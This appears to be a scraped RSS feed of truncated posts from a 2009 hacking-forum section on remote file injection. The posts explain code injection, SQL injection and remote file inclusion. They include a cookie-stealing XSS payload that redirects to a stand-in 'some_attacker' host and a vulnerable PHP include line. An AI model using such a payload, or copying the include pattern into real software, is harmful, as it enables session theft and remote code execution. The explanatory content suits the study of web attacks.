Remote File Injection http://h4ck3d.forumotion.net/remote-file-injection-f6/-t1.htm Thu, 08 Jan 2009 17:22:49 GMT 10 Remote File Injection http://illiweb.com/fa/prosilver_grey/site_logo.gif http://h4ck3d.forumotion.net/remote-file-injection-f6/-t1.htm Code Injection Usages http://h4ck3d.forumotion.net/remote-file-injection-f6/code-injection-usages-t18.htm JeSTeR
A web server has a "Guest book" script, which accepts small messages from users, and typically receives messages such as

Nice site!

However a malicious person may know of a code injection vulnerability in the "Guest book", and enters a message such as

Nice Site, I think I'll take it.><script>document.location='http://some_attacker/cookie.cgi?' +document]]> Remote File Injection Thu, 08 Jan 2009 17:22:49 GMT http://h4ck3d.forumotion.net/remote-file-injection-f6/code-injection-usages-t18.htm#18 http://h4ck3d.forumotion.net/remote-file-injection-f6/code-injection-usages-t18.htm Code injection http://h4ck3d.forumotion.net/remote-file-injection-f6/code-injection-t17.htm JeSTeR Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by an attacker to introduce (or "inject") code into a computer program to change the course of execution. The results of a Code Injection attack can be disastrous. For instance, code injection is used by some Computer worms to propagate. Examples of Code Injection SQL Injection SQL injection takes advantage of the syntax of SQL to inject commands that ... Remote File Injection Thu, 08 Jan 2009 17:20:45 GMT http://h4ck3d.forumotion.net/remote-file-injection-f6/code-injection-t17.htm#17 http://h4ck3d.forumotion.net/remote-file-injection-f6/code-injection-t17.htm Remote File Inclusion http://h4ck3d.forumotion.net/remote-file-injection-f6/remote-file-inclusion-t16.htm JeSTeR Remote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own (malicious) code in the space provided for PHP programs on a web page. For instance, a piece of vulnerable PHP code would look like this: include($page . '.php'); This line of PHP code, is then used in URLs like the following example: http://www.vulnerable.example.org/index.php?page=archive Because the $page variable is not specifically ... Remote File Injection Thu, 08 Jan 2009 17:18:56 GMT http://h4ck3d.forumotion.net/remote-file-injection-f6/remote-file-inclusion-t16.htm#16 http://h4ck3d.forumotion.net/remote-file-injection-f6/remote-file-inclusion-t16.htm